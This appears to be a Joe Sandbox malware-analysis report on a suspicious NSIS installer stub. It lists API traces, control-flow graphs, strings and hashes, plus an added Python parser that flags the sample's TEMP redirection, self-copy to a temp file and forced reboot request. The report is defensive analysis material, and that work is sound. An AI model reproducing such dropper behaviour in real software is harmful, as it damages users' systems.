• CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
• DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
• CopyFileW.KERNEL32(C:\Users\user\Desktop\________.exe,0041FE90,00000001), ref: 004036DA
• CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
• GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
• ExitProcess.KERNEL32 ref: 004037BC
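The listing above is the flat API trace the sandbox recorded for the stub's entry function. Before writing a detection or a triage note, an analyst normally turns such a trace into structured records and a handful of behaviour flags (TEMP/TMP redirection, a copy of the sample being written, a reboot request). The Python below is an added example, not part of this report or of Joe Sandbox's tooling: it parses lines in the `API.MODULE(args), ref: ADDR` shape seen here, including the indented `Part of subcall function X:` entries, and summarises them. The input lines are copied from the listing; the regex and the flag names are the example's own assumptions about the format, not an official schema.

```python
"""Parse Joe Sandbox 'APIs' listing lines into records and a behaviour summary.

Added example, not part of the report or of Joe Sandbox's tooling. The line
format (`API.MODULE(args), ref: ADDR`, with `Part of subcall function X:`
prefixes) is inferred from the listing on this page; the flag names are ours.
"""
import re
from collections import Counter

# Input copied from the report's APIs listing for function 0040335A.
API_LINES = r"""
• #17.COMCTL32 ref: 00403379
• SetErrorMode.KERNELBASE(00008001), ref: 00403384
• OleInitialize.OLE32(00000000), ref: 0040338B
  • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
• GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C8
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040350B
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403528
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403555
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355D
• CopyFileW.KERNEL32(C:\Users\user\Desktop\________.exe,0041FE90,00000001), ref: 004036DA
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
• ExitProcess.KERNEL32 ref: 004037BC
"""

SAMPLE_PATH = r"C:\Users\user\Desktop\________.exe"

# One listing line: optional subcall prefix, API.MODULE, optional (args), ref: ADDR.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[#\w]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# ExitWindowsEx uFlags bits (winuser.h); a value of 0 means EWX_LOGOFF.
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}


def parse_api_line(line):
    """Return a record dict for one listing line, or None if it is not one."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [a.strip() for a in args.split(",")] if args is not None else [],
        "ref": m.group("ref").upper(),
        "subcall": m.group("subcall"),  # address of the helper that made the call, or None
    }


def parse_api_listing(text):
    """Parse every listing line in `text`; non-matching lines are dropped."""
    return [r for r in map(parse_api_line, text.splitlines()) if r]


def decode_exitwindowsex(flags_hex):
    """Name the EWX_* bits in an ExitWindowsEx uFlags value given as hex."""
    value = int(flags_hex, 16)
    if value == 0:
        return ["EWX_LOGOFF"]
    return [name for bit, name in sorted(EWX_FLAGS.items()) if value & bit]


def summarize(records, sample_path=None):
    """Derive triage flags from the trace; every flag is a fact visible in it."""
    flags = []
    for r in records:
        api, args = r["api"], r["args"]
        if api in ("LoadLibraryA", "LoadLibraryW", "GetProcAddress"):
            flags.append(f"dynamic-import:{api}")
        elif api == "SetEnvironmentVariableW" and len(args) >= 2 and args[0] in ("TEMP", "TMP"):
            flags.append(f"temp-redirect:{args[0]}={args[1]}")
        elif api == "CopyFileW" and sample_path and args and args[0] == sample_path:
            flags.append("self-copy")  # the sample writes a copy of itself elsewhere
        elif api == "ExitWindowsEx" and args:
            flags.append("shutdown:" + "|".join(decode_exitwindowsex(args[0])))
    direct = sum(1 for r in records if r["subcall"] is None)
    return {
        "direct_calls": direct,
        "subcall_calls": len(records) - direct,
        "modules": Counter(r["module"] for r in records),
        "flags": flags,
    }


if __name__ == "__main__":
    for key, val in summarize(parse_api_listing(API_LINES), SAMPLE_PATH).items():
        print(f"{key}: {val}")
```

The `ref` field is the return address inside the stub, so grouping records by it reconstructs call order and lets you line up the summary against the control-flow graph; the ExitWindowsEx argument 00000002 decodes to EWX_REBOOT, which together with the SeShutdownPrivilege string is the reboot path of the installer.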
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
• String ID: "C:\Users\user\Desktop\________.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$C:\Users\user\AppData\Local\foreslaaende\Sluggardliness$C:\Users\user\Desktop$C:\Users\user\Desktop\________.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
• API String ID: 4107622049-728878773
• Opcode ID: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
• Instruction ID: adac61535fb2ab45c93a94ea6b46826cba801cc8f349b6914fd9ce0ca4797ca8
• Opcode Fuzzy Hash: 19452a82f84b89d672e287bbd9b4a7210e15b48e73439f139737dd6fa92c6ca7
• Instruction Fuzzy Hash: 72B1C170904211AAD720BF619D49A3B3EACEB4570AF40453FF542BA2E2D77C9941CB7E

Control-flow Graph

Legend: • Executed • Not Executed

Function 00404B10 (installer dialog set-up; basic-block graph rendered as a figure in the original report). The blocks call GetDlgItem (twice), GlobalAlloc, LoadBitmapW, SetWindowLongW, ImageList_Create, ImageList_AddMasked, SendMessageW (repeatedly, to populate the tree-view control), DeleteObject, GetWindowLongW, ShowWindow, ImageList_Destroy, GlobalFree and InvalidateRect. The per-call arguments are listed under APIs below.
APIs
• GetDlgItem.USER32(?,000003F9), ref: 00404B28
• GetDlgItem.USER32(?,00000408), ref: 00404B33
• GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
• LoadBitmapW.USER32(0000006E), ref: 00404B90
• SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
• SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
• DeleteObject.GDI32(00000000), ref: 00404C06
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
• SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
• SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
• SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
• GetWindowLongW.USER32(?,000000F0), ref: 00404D41
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
• ShowWindow.USER32(?,00000005), ref: 00404D60
• SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
• SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
• SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
• SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
• SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
• ImageList_Destroy.COMCTL32(?), ref: 00404F30
• GlobalFree.KERNEL32(?), ref: 00404F40
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
• SendMessageW.USER32(?,00001102,?,?), ref: 00405062
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
• InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
• ShowWindow.USER32(?,00000000), ref: 004050DF
• GetDlgItem.USER32(?,000003FE), ref: 004050EA
• ShowWindow.USER32(00000000), ref: 004050F1
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
• String ID: $M$N
• API String ID: 1638840714-813528018

Control-flow Graph

APIs
• GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
• GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
• GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
• SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
• SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
• CoTaskMemFree.OLE32(?), ref: 004060B5
• lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
• lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
Strings
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-1230650788

Control-flow Graph

APIs
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 0040579B
• lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 004057E3
• lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 00405806
• lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 0040580C
• FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,"C:\Users\user\Desktop\________.exe"), ref: 0040581C
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
• FindClose.KERNEL32(00000000), ref: 004058CB
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
• "C:\Users\user\Desktop\________.exe", xrefs: 0040577B
• \*.*, xrefs: 004057DD
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: "C:\Users\user\Desktop\________.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-1994770991
                                                                                                                                                  • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                                  • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                                  • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                                  • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75572EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406238
• FindClose.KERNEL32(00000000), ref: 00406244
Strings
Similarity
• API ID: Find$CloseFileFirst
• String ID: WB
• API String ID: 2295610775-2854515933
APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
• LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
• GetProcAddress.KERNEL32(00000000,?), ref: 00406282
Similarity
• API ID: AddressHandleLibraryLoadModuleProc
• String ID:
• API String ID: 310444273-0

Control-flow Graph (function at 004038B4; rendered graph and edge list not reproduced)
APIs
  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
  • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
• lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75573420,00000000,"C:\Users\user\Desktop\________.exe"), ref: 00403935
• lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
• lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
• GetFileAttributesW.KERNEL32(Call), ref: 004039D3
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\foreslaaende), ref: 00403A1C
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
• RegisterClassW.USER32(00428180), ref: 00403A59
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
• ShowWindow.USER32(00000005,00000000), ref: 00403ADC
• LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
• LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
• GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
• GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
• RegisterClassW.USER32(00428180), ref: 00403B1E
• DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
Strings
Similarity
• API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\________.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 914957316-946982534

Control-flow Graph (function at 00403C57; rendered graph and edge list not reproduced)
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
• ShowWindow.USER32(?), ref: 00403CB0
• DestroyWindow.USER32 ref: 00403CC4
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
• GetDlgItem.USER32(?,?), ref: 00403D01
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
• IsWindowEnabled.USER32(00000000), ref: 00403D1C
• GetDlgItem.USER32(?,00000001), ref: 00403DCA
• GetDlgItem.USER32(?,00000002), ref: 00403DD4
• SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
• GetDlgItem.USER32(?,00000003), ref: 00403EE5
• ShowWindow.USER32(00000000,?), ref: 00403F06
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
• EnableWindow.USER32(?,?), ref: 00403F33
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
• EnableMenuItem.USER32(00000000), ref: 00403F50
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
• lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
• SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
• ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_________.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3282139019-0
                                                                                                                                                  • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                                  • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                                                                                                  • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                                                                                                  • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 412 402dbc-402e0a GetTickCount GetModuleFileNameW call 405b56 415 402e16-402e44 call 405eea call 405981 call 405eea GetFileSize 412->415 416 402e0c-402e11 412->416 424 402f34-402f42 call 402d1a 415->424 425 402e4a-402e61 415->425 417 40305b-40305f 416->417 431 403013-403018 424->431 432 402f48-402f4b 424->432 427 402e63 425->427 428 402e65-402e72 call 4032f9 425->428 427->428 436 402e78-402e7e 428->436 437 402fcf-402fd7 call 402d1a 428->437 431->417 434 402f77-402fc3 GlobalAlloc call 406370 call 405b85 CreateFileW 432->434 435 402f4d-402f65 call 40330f call 4032f9 432->435 461 402fc5-402fca 434->461 462 402fd9-403009 call 40330f call 403062 434->462 435->431 464 402f6b-402f71 435->464 441 402e80-402e98 call 405b11 436->441 442 402efe-402f02 436->442 437->431 446 402f0b-402f11 441->446 457 402e9a-402ea1 441->457 445 402f04-402f0a call 402d1a 442->445 442->446 445->446 453 402f13-402f21 call 406302 446->453 454 402f24-402f2e 446->454 453->454 454->424 454->425 457->446 463 402ea3-402eaa 457->463 461->417 472 40300e-403011 462->472 463->446 465 402eac-402eb3 463->465 464->431 464->434 465->446 467 402eb5-402ebc 465->467 467->446 469 402ebe-402ede 467->469 469->431 471 402ee4-402ee8 469->471 473 402ef0-402ef8 471->473 474 402eea-402eee 471->474 472->431 475 40301a-40302b 472->475 473->446 476 402efa-402efc 473->476 474->424 474->473 477 403033-403038 475->477 478 40302d 475->478 476->446 479 403039-40303f 477->479 478->477 479->479 480 403041-403059 call 405b11 479->480 480->417
APIs
• GetTickCount.KERNEL32 ref: 00402DD0
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\________.exe,00000400), ref: 00402DEC
  • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00405B5A
  • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
• GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\________.exe,C:\Users\user\Desktop\________.exe,80000000,00000003), ref: 00402E35
• GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
Strings
Memory Dump Source
• Source File: 00000001.00000002.1622740996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1622726134.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622756571.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622773705.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1622861428.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_________.jbxd
Similarity
• API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\________.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\________.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
• API String ID: 2803837635-4087227246
• Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
• Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
• Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
• Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
APIs
  • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,00000001), ref: 10001225
  • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
  • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
• GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C4A
• lstrcpyW.KERNEL32(00000008,?), ref: 10001C92
• lstrcpyW.KERNEL32(00000808,?), ref: 10001C9C
• GlobalFree.KERNEL32(00000000), ref: 10001CAF
• GlobalFree.KERNEL32(?), ref: 10001DA9
• GlobalFree.KERNEL32(?), ref: 10001DAE
• GlobalFree.KERNEL32(?), ref: 10001DB3
• GlobalFree.KERNEL32(00000000), ref: 10001F57
• lstrcpyW.KERNEL32(?,?), ref: 100020BB
Memory Dump Source
• Source File: 00000001.00000002.1630387930.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.1630302750.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630505484.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.1630587983.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_________.jbxd
Similarity
• API ID: Global$Free$lstrcpy$Alloc
• String ID:
• API String ID: 4227406936-0
• Opcode ID: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
• Instruction ID: 71c1a880e39e69f42b548688fcbdb76c41956fc1357523659d9e12ead3b80716
• Opcode Fuzzy Hash: 0c4dc19f5173d816200b72df7880e601467eff42a6c84a7c618bf63198036684
• Instruction Fuzzy Hash: F9127A75D0064ADBEB20CFA4C8846EEB7F4FF083D5F21452AE5A5E3288D7749A81DB50
Control-flow Graph (legend: Executed / Not Executed)
control_flow_graph 808 401752-401777 call 402b3a call 4059ac 813 401781-401793 call 405eea call 405935 lstrcatW 808->813 814 401779-40177f call 405eea 808->814 819 401798-401799 call 40617e 813->819 814->819 823 40179e-4017a2 819->823 824 4017a4-4017ae call 40622d 823->824 825 4017d5-4017d8 823->825 832 4017c0-4017d2 824->832 833 4017b0-4017be CompareFileTime 824->833 826 4017e0-4017fc call 405b56 825->826 827 4017da-4017db call 405b31 825->827 835 401870-401899 call 405194 call 403062 826->835 836 4017fe-401801 826->836 827->826 832->825 833->832 848 4018a1-4018ad SetFileTime 835->848 849 40189b-40189f 835->849 837 401852-40185c call 405194 836->837 838 401803-401841 call 405eea * 2 call 405f0c call 405eea call 4056c6 836->838 850 401865-40186b 837->850 838->823 870 401847-401848 838->870 852 4018b3-4018be CloseHandle 848->852 849->848 849->852 853 4029d0 850->853 855 4018c4-4018c7 852->855 856 4029c7-4029ca 852->856 857 4029d2-4029d6 853->857 860 4018c9-4018da call 405f0c lstrcatW 855->860 861 4018dc-4018df call 405f0c 855->861 856->853 867 4018e4-402243 call 4056c6 860->867 861->867 867->857 870->850 872 40184a-40184b 870->872 872->837
APIs
• lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende\Sluggardliness,?,?,00000031), ref: 00401793
• CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\foreslaaende\Sluggardliness,?,?,00000031), ref: 004017B8
  • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
